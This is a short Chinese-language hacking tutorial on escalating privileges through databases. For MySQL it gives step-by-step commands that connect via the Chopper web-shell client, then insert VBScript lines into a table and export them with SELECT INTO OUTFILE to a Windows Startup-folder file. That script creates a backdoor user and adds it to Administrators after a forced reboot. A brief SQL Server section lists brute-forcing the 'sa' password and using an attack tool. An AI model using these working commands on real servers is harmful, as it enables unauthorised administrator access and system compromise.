数据库提权
mysql数据库启动项提权
1、先连接菜刀
mysql> create table a (cmd text); //创建表a,字段名字为cmd,以文本(text)的形式添加
Mysql>insert into a values (“set wshshell=createobject (“”wscript.shell””)”);//给cmd字段加括号里面的东西:
Mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user lanbo lanbo /add”“,0)”);
//cmd.exe代表命令行,/c是没有回显,net user lanbo lanbo /add ,这个意思是加一个用户,也就是名字是lanbo,密码也是lanbo,””,0是断开的意思,和后面的
Mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators lanbo /add"",0)");
//这条语句的意思是将刚才创建的用户加到管理员组
注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
mysql>select * from a;//确认插入的东西是否正确
mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//lanbo.vbs";
//在这个目录下创建一个名字为lanbo.vbs的启动项文件
最后通过一些手段使服务器重启,执行这个启动项文件
sqlserver提权
1、爆破sa密码(用bruter工具)
2、打开sqltool的工具,这个工具的作用就是用来连接数据库,使用数据库进行提权操作